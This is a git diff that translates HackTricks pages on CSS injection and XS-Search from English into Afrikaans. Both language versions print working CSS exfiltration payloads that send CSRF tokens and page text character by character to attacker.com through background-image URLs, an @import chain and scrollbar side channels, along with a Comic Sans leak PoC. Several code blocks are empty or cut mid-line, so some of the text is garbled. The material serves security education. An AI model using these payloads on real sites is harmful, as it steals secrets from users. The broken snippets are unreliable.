-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

 
-The following **script** taken from [**here**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) is exploiting a functionality that allows the user to **insert any amount of cookies**, and then loading a file as a script knowing that the true response will be larger than the false one and then. If successful, the response is a redirect with a resulting URL longer, **too large to handle by the server so return an error http status code**. If the search fails, nothing will happen because URL is short.
-
+Die volgende **skripsie** geneem vanaf [**hier**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) maak gebruik van 'n funksionaliteit wat die gebruiker toelaat om **enige hoeveelheid koekies in te voeg**, en dan 'n lêer as 'n skripsie te laai met die wete dat die ware respons groter sal wees as die valse een en dan. As dit suksesvol is, is die respons 'n omleiding met 'n resulterende URL wat langer is, **te groot om deur die bediener hanteer te word, dus gee 'n fout HTTP-statuskode terug**. As die soektog misluk, sal niks gebeur nie omdat die URL kort is.
 ```html
 <>'";

 
 ```
-
-
-
-
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

diff --git a/pentesting-web/xs-search/css-injection/README.md b/pentesting-web/xs-search/css-injection/README.md
index 93179e864..2cbaf95f8 100644
--- a/pentesting-web/xs-search/css-injection/README.md
+++ b/pentesting-web/xs-search/css-injection/README.md
@@ -1,106 +1,97 @@
-# CSS Injection
+# CSS Injeksie
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## CSS Injection
+## CSS Injeksie
 
-### Attribute Selector
-
-CSS selectors are crafted to match values of an `input` element's `name` and `value` attributes. If the input element's value attribute starts with a specific character, a predefined external resource is loaded:
+### Atribuutselekteerder
 
+CSS-selekteerders is ontwerp om waardes van 'n `input`-element se `name`- en `value`-eienskappe te pas. As die waarde-eienskap van die invoerelement begin met 'n spesifieke karakter, word 'n voorafbepaalde eksterne bron gelaai:
 ```css
 input[name=csrf][value^=a]{
-    background-image: url(https://attacker.com/exfil/a);
+background-image: url(https://attacker.com/exfil/a);
 }
 input[name=csrf][value^=b]{
-    background-image: url(https://attacker.com/exfil/b);
+background-image: url(https://attacker.com/exfil/b);
 }
 /* ... */
 input[name=csrf][value^=9]{
-    background-image: url(https://attacker.com/exfil/9);   
+background-image: url(https://attacker.com/exfil/9);
 }
 ```
+Hierdie benadering het egter 'n beperking wanneer dit kom by verborge invoerelemente (`type="hidden"`) omdat verborge elemente nie agtergronde laai nie.
 
-However, this approach faces a limitation when dealing with hidden input elements (`type="hidden"`) because hidden elements do not load backgrounds.
-
-#### Bypass for Hidden Elements
-
-To circumvent this limitation, you can target a subsequent sibling element using the `~` general sibling combinator. The CSS rule then applies to all siblings following the hidden input element, causing the background image to load:
+#### Oorweging vir Verborge Elemente
 
+Om hierdie beperking te omseil, kan jy 'n volgende broer-element teiken deur die `~` algemene broer-kombineerder te gebruik. Die CSS-reël is dan van toepassing op alle broers wat volg op die verborge invoerelement, wat veroorsaak dat die agtergrondbeeld laai:
 ```css
 input[name=csrf][value^=csrF] ~ * {
-    background-image: url(https://attacker.com/exfil/csrF);
+background-image: url(https://attacker.com/exfil/csrF);
 }
 ```
+'n Praktiese voorbeeld van die uitbuiting van hierdie tegniek word in die voorsiene kodefragment beskryf. Jy kan dit [hier](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e) besigtig.
 
-A practical example of exploiting this technique is detailed in the provided code snippet. You can view it [here](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e).
+#### Voorvereistes vir CSS-injeksie
 
-#### Prerequisites for CSS Injection
+Om die CSS-injeksietegniek effektief te benut, moet sekere voorwaardes voldoen word:
 
-For the CSS Injection technique to be effective, certain conditions must be met:
+1. **Payload-lengte**: Die CSS-injeksievektor moet voldoende lang payloads ondersteun om die gekonstrueerde selekteerders te akkommodeer.
+2. **CSS-herwaardering**: Jy moet die vermoë hê om die bladsy te raamwerk, wat nodig is om die herwaardering van CSS met nuut gegenereerde payloads te trigger.
+3. **Eksterne Hulpbronne**: Die tegniek neem aan dat die gebruik van eksterne gehuisvese beelde moontlik is. Dit kan beperk word deur die webwerf se inhoudsbeveiligingsbeleid (CSP).
 
-1. **Payload Length**: The CSS injection vector must support sufficiently long payloads to accommodate the crafted selectors.
-2. **CSS Re-evaluation**: You should have the ability to frame the page, which is necessary to trigger the re-evaluation of CSS with newly generated payloads.
-3. **External Resources**: The technique assumes the ability to use externally hosted images. This might be restricted by the site's Content Security Policy (CSP).
-
-### Blind Attribute Selector
-
-As [**explained in this post**](https://portswigger.net/research/blind-css-exfiltration), it's possible to combine the selectors **`:has`** and **`:not`** to identify content even from blind elements. This is very useful when you have no idea what is inside the web page loading the CSS injection.\
-It's also possible to use those selectors to extract information from several block of the same type like in:
+### Blinde Eienskapsselekteerder
 
+Soos [**verduidelik in hierdie pos**](https://portswigger.net/research/blind-css-exfiltration), is dit moontlik om die selekteerders **`:has`** en **`:not`** te kombineer om inhoud selfs van blinde elemente te identifiseer. Dit is baie nuttig wanneer jy geen idee het wat binne die webbladsy wat die CSS-injeksie laai, is nie.\
+Dit is ook moontlik om hierdie selekteerders te gebruik om inligting uit verskeie blokke van dieselfde tipe te onttrek, soos in:
 ```html
 
 
 
 ```
-
-Combining this with the following **@import** technique, it's possible to exfiltrate a lot of **info using CSS injection from blind pages with** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.**
+Deur dit te kombineer met die volgende **@import** tegniek, is dit moontlik om baie **inligting te eksfiltreer deur middel van CSS-injeksie vanaf blinde bladsye met** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.**
 
 ### @import
 
-The previous technique has some drawbacks, check the prerequisites. You either need to be able to **send multiple links to the victim**, or you need to be able to **iframe the CSS injection vulnerable page**.
+Die vorige tegniek het 'n paar nadele, kyk na die vereistes. Jy moet óf in staat wees om **verskeie skakels na die slagoffer te stuur**, óf jy moet in staat wees om **die CSS-injeksie vatbare bladsy in 'n ifram te plaas**.
 
-However, there is another clever technique that uses **CSS `@import`** to improve the quality of the technique.
+Daar is egter 'n ander slim tegniek wat gebruik maak van **CSS `@import`** om die kwaliteit van die tegniek te verbeter.
 
-This was first showed by [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) and it works like this:
-
-Instead of loading the same page once and again with tens of different payloads each time (like in the previous one), we are going to **load the page just once and just with an import to the attackers server** (this is the payload to send to the victim):
+Dit is vir die eerste keer gewys deur [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) en dit werk so:
 
+In plaas daarvan om die bladsy telkens weer te laai met tientalle verskillende lading elke keer (soos in die vorige een), gaan ons die bladsy net een keer laai en net met 'n invoer na die aanvaller se bediener (dit is die lading wat na die slagoffer gestuur moet word):
 ```css
 @import url('//attacker.com:5001/start?');
 ```
+1. Die invoer gaan **CSS-skrips** van die aanvallers ontvang en die **blaaier sal dit laai**.
+2. Die eerste deel van die CSS-skrips wat die aanvaller sal stuur, is **nog 'n `@import` na die aanvallers se bediener**.
+1. Die aanvallers se bediener sal nog nie hierdie versoek beantwoord nie, omdat ons 'n paar karakters wil lek en dan hierdie invoer beantwoord met die payload om die volgende karakters te lek.
+3. Die tweede en groter deel van die payload gaan 'n **attribuutselekteerder-lekkasie-payload** wees.
+1. Dit sal die aanvallers se bediener die **eerste karakter van die geheim en die laaste een** stuur.
+4. Sodra die aanvallers se bediener die **eerste en laaste karakter van die geheim ontvang het**, sal dit die invoer wat in stap 2 versoek is, **beantwoord**.
+1. Die antwoord gaan presies dieselfde wees as die **stappe 2, 3 en 4**, maar hierdie keer sal dit probeer om die tweede karakter van die geheim te **vind en dan die voorlaaste**.
 
-1. The import is going to **receive some CSS script** from the attackers and the **browser will load it**.
-2. The first part of the CSS script the attacker will send is **another `@import` to the attackers server again.**
-   1. The attackers server won't respond this request yet, as we want to leak some chars and then respond this import with the payload to leak the next ones.
-3. The second and bigger part of the payload is going to be an **attribute selector leakage payload**
-   1. This will send to the attackers server the **first char of the secret and the last one**
-4. Once the attackers server has received the **first and last char of the secret**, it will **respond the import requested in the step 2**.
-   1. The response is going to be exactly the same as the **steps 2, 3 and 4**, but this time it will try to **find the second char of the secret and then penultimate**.
+Die aanvaller sal **hierdie lus volg totdat dit die geheim heeltemal lek**.
 
-The attacker will f**ollow that loop until it manages to leak completely the secret**.
-
-You can find the original [**Pepe Vila's code to exploit this here**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) or you can find almost the [**same code but commented here**.](./#css-injection)
+Jy kan die oorspronklike [**Pepe Vila se kode om hiervan gebruik te maak hier vind**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) of jy kan byna dieselfde [**kode maar met kommentaar hier vind**](./#css-injection)
 
 {% hint style="info" %}
-The script will try to discover 2 chars each time (from the beginning and from the end) because the attribute selector allows to do things like:
-
+Die skrips sal elke keer probeer om 2 karakters te ontdek (van die begin en van die einde) omdat die attribuutselekteerder dit moontlik maak om dinge soos:
 ```css
 /* value^=  to match the beggining of the value*/
 input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}
@@ -108,48 +99,46 @@ input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}
 /* value$=  to match the ending of the value*/
 input[value$="f"]{--e0:url(http://localhost:5001/leak?post=f)}
 ```
-
-This allows the script to leak the secret faster.
+Dit stel die skrip in staat om die geheim vinniger te lek.
 {% endhint %}
 
 {% hint style="warning" %}
-Sometimes the script **doesn't detect correctly that the prefix + suffix discovered is already the complete flag** and it will continue forwards (in the prefix) and backwards (in the suffix) and at some point it will hang.\
-No worries, just check the **output** because **you can see the flag there**.
+Soms **detecteer die skrip nie korrek dat die ontdekte voorvoegsel + agtervoegsel reeds die volledige vlag is nie** en dit sal voortgaan (in die voorvoegsel) en agteruit (in die agtervoegsel) en op 'n punt sal dit hang.\
+Moenie bekommerd wees nie, kyk net na die **uitset** omdat **jy die vlag daar kan sien**.
 {% endhint %}
 
-### Other selectors
+### Ander selekteerders
 
-Other ways to access DOM parts with **CSS selectors**:
+Ander maniere om DOM-dele met **CSS-selekteerders** te benader:
 
-* **`.class-to-search:nth-child(2)`**: This will search the second item with class "class-to-search" in the DOM.
-*   **`:empty`** selector: Used for example in [**this writeup**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:**
+* **`.klas-om-te-soek:nth-child(2)`**: Dit sal die tweede item met die klas "klas-om-te-soek" in die DOM soek.
+*   **`:empty`** selekteerder: Gebruik byvoorbeeld in [**hierdie writeup**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:**
 
-    ```css
-    [role^="img"][aria-label="1"]:empty { background-image: url("YOUR_SERVER_URL?1"); }
-    ```
+```css
+[role^="img"][aria-label="1"]:empty { background-image: url("JOU_BEDIENER_URL?1"); }
+```
 
-### Error based XS-Search
+### Fout-gebaseerde XS-Soek
 
-**Reference:** [CSS based Attack: Abusing unicode-range of @font-face ](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [Error-Based XS-Search PoC by @terjanq](https://twitter.com/terjanq/status/1180477124861407234)
-
-The overall intention is to **use a custom font from a controlled endpoint** and ensure that **text (in this case, 'A') is displayed with this font only if the specified resource (`favicon.ico`) cannot be loaded**.
+**Verwysing:** [Aanval gebaseer op CSS: Misbruik van unicode-reeks van @font-face ](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [Fout-gebaseerde XS-Soek PoC deur @terjanq](https://twitter.com/terjanq/status/1180477124861407234)
 
+Die algemene bedoeling is om **'n aangepaste lettertipe vanaf 'n beheerde eindpunt te gebruik** en te verseker dat **teks (in hierdie geval, 'A') slegs met hierdie lettertipe vertoon word as die gespesifiseerde bron (`favicon.ico`) nie gelaai kan word nie**.
 ```html
 
 
 
-    
+
 
 
 
@@ -157,123 +146,116 @@ The overall intention is to **use a custom font from a controlled endpoint** and
 
 
 ```
+1. **Aangepaste Lettertype Gebruik**:
+- 'n Aangepaste lettertype word gedefinieer deur die `@font-face` reël binne 'n `
 
 
AB
htm
 ```
+Wanneer jy hierdie bladsy besoek, haal Chrome en Firefox "?A" en "?B" op omdat die teksnode van sensitiewe inligting "A" en "B" karakters bevat. Maar Chrome en Firefox haal nie "?C" op nie omdat dit nie "C" bevat nie. Dit beteken dat ons in staat was om "A" en "B" te lees.
 
-When you access this page, Chrome and Firefox fetch "?A" and "?B" because text node of sensitive-information contains "A" and "B" characters. But Chrome and Firefox do not fetch "?C" because it does not contain "C". This means that we have been able to read "A" and "B".
+### Uitlek van teksnode (I): ligature 
 
-### Text node exfiltration (I): ligatures 
+**Verwysing:** [Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
 
-**Reference:** [Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
+Die tegniek wat beskryf word, behels die onttrekking van teks uit 'n node deur gebruik te maak van letterligature en die monitering van veranderinge in breedte. Die proses behels verskeie stappe:
 
-The technique described involves extracting text from a node by exploiting font ligatures and monitoring changes in width. The process involves several steps:
+1. **Skepping van aangepaste lettertipes**:
+- SVG-lettertipes word vervaardig met gliefies wat 'n `horiz-adv-x` eienskap het, wat 'n groot breedte vir 'n glief verteenwoordig wat 'n twee-karakter volgorde voorstel.
+- Voorbeeld SVG-glief: ``, waar "XY" 'n twee-karakter volgorde aandui.
+- Hierdie lettertipes word dan omskakel na woff-formaat deur gebruik te maak van fontforge.
 
-1. **Creation of Custom Fonts**:
-    - SVG fonts are crafted with glyphs having a `horiz-adv-x` attribute, which sets a large width for a glyph representing a two-character sequence.
-    - Example SVG glyph: ``, where "XY" denotes a two-character sequence.
-    - These fonts are then converted to woff format using fontforge.
+2. **Opsporing van Breedteveranderinge**:
+- CSS word gebruik om te verseker dat teks nie omslaan nie (`white-space: nowrap`) en om die skuifbalk-styl aan te pas.
+- Die verskyning van 'n horisontale skuifbalk, wat duidelik gestyl is, dien as 'n aanduiding (orakel) dat 'n spesifieke ligatuur, en dus 'n spesifieke karaktervolgorde, teenwoordig is in die teks.
+- Die betrokke CSS:
+```css
+body { white-space: nowrap };
+body::-webkit-scrollbar { background: blue; }
+body::-webkit-scrollbar:horizontal { background: url(http://attacker.com/?leak); }
+```
 
-2. **Detection of Width Changes**:
-    - CSS is used to ensure that text does not wrap (`white-space: nowrap`) and to customize the scrollbar style.
-    - The appearance of a horizontal scrollbar, styled distinctly, acts as an indicator (oracle) that a specific ligature, and hence a specific character sequence, is present in the text.
-    - The CSS involved:
-        ```css
-        body { white-space: nowrap }; 
-        body::-webkit-scrollbar { background: blue; }
-        body::-webkit-scrollbar:horizontal { background: url(http://attacker.com/?leak); }
-        ```
+3. **Uitbuitingsproses**:
+- **Stap 1**: Lettertipes word geskep vir paartjies karakters met aansienlike breedte.
+- **Stap 2**: 'n Skuifbalk-gebaseerde truuk word gebruik om op te spoor wanneer die glief met groot breedte (ligatuur vir 'n karakterpaar) weergegee word, wat die teenwoordigheid van die karaktervolgorde aandui.
+- **Stap 3**: Met die opsporing van 'n ligatuur word nuwe gliefies gegenereer wat drie-karakter volgordes voorstel, waarin die opgespoorde paar ingesluit word en 'n voorafgaande of volgende karakter bygevoeg word.
+- **Stap 4**: Die opsporing van die drie-karakter ligatuur word uitgevoer.
+- **Stap 5**: Die proses herhaal, waardeur die volledige teks geleidelik onthul word.
 
-3. **Exploit Process**:
-    - **Step 1**: Fonts are created for pairs of characters with substantial width.
-    - **Step 2**: A scrollbar-based trick is employed to detect when the large width glyph (ligature for a character pair) is rendered, indicating the presence of the character sequence.
-    - **Step 3**: Upon detecting a ligature, new glyphs representing three-character sequences are generated, incorporating the detected pair and adding a preceding or succeeding character.
-    - **Step 4**: Detection of the three-character ligature is carried out.
-    - **Step 5**: The process repeats, progressively revealing the entire text.
+4. **Optimering**:
+- Die huidige inisialisasiemetode met behulp van `
 
-### Text node exfiltration (II): leaking the charset with a default font (not requiring external assets) 
+**Verwysing:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)
 
-**Reference:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)
+Hierdie truuk is vrygestel in hierdie [**Slackers-thread**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what\_can\_we\_do\_with\_single\_css\_injection/). Die karakterstel wat in 'n teksnode gebruik word, kan **met die versteklettertipes** wat in die blaaier geïnstalleer is, uitgelek word: geen eksterne - of aangepaste - lettertipes is nodig nie.
 
-This trick was released in this [**Slackers thread**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what\_can\_we\_do\_with\_single\_css\_injection/). The charset used in a text node can be leaked **using the default fonts** installed in the browser: no external -or custom- fonts are needed.
+Die konsep draai om die gebruik van 'n animasie om 'n `div` se breedte geleidelik te vergroot, sodat een karakter op 'n slag van die 'suffix'-gedeelte van die teks na die 'prefix'-gedeelte kan oorgaan. Hierdie proses verdeel die teks effektief in twee afdelings:
 
-The concept revolves around utilizing an animation to incrementally expand a `div`'s width, allowing one character at a time to transition from the 'suffix' part of the text to the 'prefix' part. This process effectively splits the text into two sections:
+1. **Prefix**: Die aanvanklike lyn.
+2. **Suffix**: Die daaropvolgende lyn(s).
 
-1. **Prefix**: The initial line.
-2. **Suffix**: The subsequent line(s).
-
-The transition stages of the characters would appear as follows:
+Die oorgangsfases van die karakters sal as volg lyk:
 
 **C**\
 ADB
@@ -287,17 +269,16 @@ B
 **CADB**
 
 
-During this transition, the **unicode-range trick** is employed to identify each new character as it joins the prefix. This is achieved by switching the font to Comic Sans, which is notably taller than the default font, consequently triggering a vertical scrollbar. This scrollbar's appearance indirectly reveals the presence of a new character in the prefix.
+Tydens hierdie oorgang word die **unicode-range truuk** gebruik om elke nuwe karakter te identifiseer wanneer dit by die prefix aansluit. Dit word bereik deur die lettertipe na Comic Sans te skakel, wat merkbaar langer as die versteklettertipe is en dus 'n vertikale skuifbalk veroorsaak. Hierdie skuifbalk se verskyning onthul indirek die teenwoordigheid van 'n nuwe karakter in die prefix.
 
-Although this method allows the detection of unique characters as they appear, it does not specify which character is repeated, only that a repetition has occurred.
+Alhoewel hierdie metode die opsporing van unieke karakters soos hulle verskyn, moontlik maak, spesifiseer dit nie watter karakter herhaal word nie, slegs dat 'n herhaling plaasgevind het.
 
 {% hint style="info" %}
-Basically, the **unicode-range is used to detect a char**, but as we don't want to load an external font, we need to find another way.\
-When the **char** is **found**, it's **given** the pre-installed **Comic Sans font**, which **makes** the char **bigger** and **triggers a scroll bar** which will **leak the found char**.
+Basies word die **unicode-range gebruik om 'n karakter op te spoor**, maar omdat ons nie 'n eksterne lettertipe wil laai nie, moet ons 'n ander manier vind.\
+Wanneer die **karakter** gevind word, word dit die vooraf geïnstalleerde **Comic Sans-lettertipe** gegee, wat die karakter **groter** maak en 'n **skuifbalk veroorsaak** wat die gevonde karakter sal **lek**.
 {% endhint %}
 
-Check the code extracted from the PoC:
-
+Kyk na die kode wat uit die PoC onttrek is:
 ```css
 /* comic sans is high (lol) and causes a vertical overflow */
 @font-face{font-family:has_A;src:local('Comic Sans MS');unicode-range:U+41;font-style:monospace;}
@@ -339,142 +320,135 @@ Check the code extracted from the PoC:
 @font-face{font-family:rest;src: local('Courier New');font-style:monospace;unicode-range:U+0-10FFFF}
 
 div.leak {
-    overflow-y: auto; /* leak channel */
-    overflow-x: hidden; /* remove false positives */
-    height: 40px; /* comic sans capitals exceed this height */
-    font-size: 0px; /* make suffix invisible */
-    letter-spacing: 0px; /* separation */
-    word-break: break-all; /* small width split words in lines */
-    font-family: rest; /* default */
-    background: grey; /* default */
-    width: 0px; /* initial value */
-    animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
-    animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
+overflow-y: auto; /* leak channel */
+overflow-x: hidden; /* remove false positives */
+height: 40px; /* comic sans capitals exceed this height */
+font-size: 0px; /* make suffix invisible */
+letter-spacing: 0px; /* separation */
+word-break: break-all; /* small width split words in lines */
+font-family: rest; /* default */
+background: grey; /* default */
+width: 0px; /* initial value */
+animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
+animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
 }
 
 div.leak::first-line{
-    font-size: 30px; /* prefix is visible in first line */
-    text-transform: uppercase; /* only capital letters leak */
+font-size: 30px; /* prefix is visible in first line */
+text-transform: uppercase; /* only capital letters leak */
 }
 
 /* iterate over all chars */
 @keyframes trychar {
-    0% { font-family: rest; } /* delay for width change */
-    5% { font-family: has_A, rest; --leak: url(?a); }
-    6% { font-family: rest; }
-    10% { font-family: has_B, rest; --leak: url(?b); }
-    11% { font-family: rest; }
-    15% { font-family: has_C, rest; --leak: url(?c); }
-    16% { font-family: rest }
-    20% { font-family: has_D, rest; --leak: url(?d); }
-    21% { font-family: rest; }
-    25% { font-family: has_E, rest; --leak: url(?e); }
-    26% { font-family: rest; }
-    30% { font-family: has_F, rest; --leak: url(?f); }
-    31% { font-family: rest; }
-    35% { font-family: has_G, rest; --leak: url(?g); }
-    36% { font-family: rest; }
-    40% { font-family: has_H, rest; --leak: url(?h); }
-    41% { font-family: rest }
-    45% { font-family: has_I, rest; --leak: url(?i); }
-    46% { font-family: rest; }
-    50% { font-family: has_J, rest; --leak: url(?j); }
-    51% { font-family: rest; }
-    55% { font-family: has_K, rest; --leak: url(?k); }
-    56% { font-family: rest; }
-    60% { font-family: has_L, rest; --leak: url(?l); }
-    61% { font-family: rest; }
-    65% { font-family: has_M, rest; --leak: url(?m); }
-    66% { font-family: rest; }
-    70% { font-family: has_N, rest; --leak: url(?n); }
-    71% { font-family: rest; }
-    75% { font-family: has_O, rest; --leak: url(?o); }
-    76% { font-family: rest; }
-    80% { font-family: has_P, rest; --leak: url(?p); }
-    81% { font-family: rest; }
-    85% { font-family: has_Q, rest; --leak: url(?q); }
-    86% { font-family: rest; }
-    90% { font-family: has_R, rest; --leak: url(?r); }
-    91% { font-family: rest; }
-    95% { font-family: has_S, rest; --leak: url(?s); }
-    96% { font-family: rest; }
+0% { font-family: rest; } /* delay for width change */
+5% { font-family: has_A, rest; --leak: url(?a); }
+6% { font-family: rest; }
+10% { font-family: has_B, rest; --leak: url(?b); }
+11% { font-family: rest; }
+15% { font-family: has_C, rest; --leak: url(?c); }
+16% { font-family: rest }
+20% { font-family: has_D, rest; --leak: url(?d); }
+21% { font-family: rest; }
+25% { font-family: has_E, rest; --leak: url(?e); }
+26% { font-family: rest; }
+30% { font-family: has_F, rest; --leak: url(?f); }
+31% { font-family: rest; }
+35% { font-family: has_G, rest; --leak: url(?g); }
+36% { font-family: rest; }
+40% { font-family: has_H, rest; --leak: url(?h); }
+41% { font-family: rest }
+45% { font-family: has_I, rest; --leak: url(?i); }
+46% { font-family: rest; }
+50% { font-family: has_J, rest; --leak: url(?j); }
+51% { font-family: rest; }
+55% { font-family: has_K, rest; --leak: url(?k); }
+56% { font-family: rest; }
+60% { font-family: has_L, rest; --leak: url(?l); }
+61% { font-family: rest; }
+65% { font-family: has_M, rest; --leak: url(?m); }
+66% { font-family: rest; }
+70% { font-family: has_N, rest; --leak: url(?n); }
+71% { font-family: rest; }
+75% { font-family: has_O, rest; --leak: url(?o); }
+76% { font-family: rest; }
+80% { font-family: has_P, rest; --leak: url(?p); }
+81% { font-family: rest; }
+85% { font-family: has_Q, rest; --leak: url(?q); }
+86% { font-family: rest; }
+90% { font-family: has_R, rest; --leak: url(?r); }
+91% { font-family: rest; }
+95% { font-family: has_S, rest; --leak: url(?s); }
+96% { font-family: rest; }
 }
 
 /* increase width char by char, i.e. add new char to prefix */
 @keyframes loop {
-    0% { width: 0px }
-    1% { width: 20px }
-    2% { width: 40px }
-    3% { width: 60px }
-    4% { width: 80px }
-    4% { width: 100px }
-    5% { width: 120px }
-    6% { width: 140px }
-    7% { width: 0px }
+0% { width: 0px }
+1% { width: 20px }
+2% { width: 40px }
+3% { width: 60px }
+4% { width: 80px }
+4% { width: 100px }
+5% { width: 120px }
+6% { width: 140px }
+7% { width: 0px }
 }
 
 div::-webkit-scrollbar {
-    background: blue;
+background: blue;
 }
 
 /* side-channel */
 div::-webkit-scrollbar:vertical {
-    background: blue var(--leak);
+background: blue var(--leak);
 }
 ```
+### Teksnodus-uitlek (III): lek van die tekenstel deur die karakterstel te verberg met 'n versteklettertipe (vereis nie eksterne bates nie) 
 
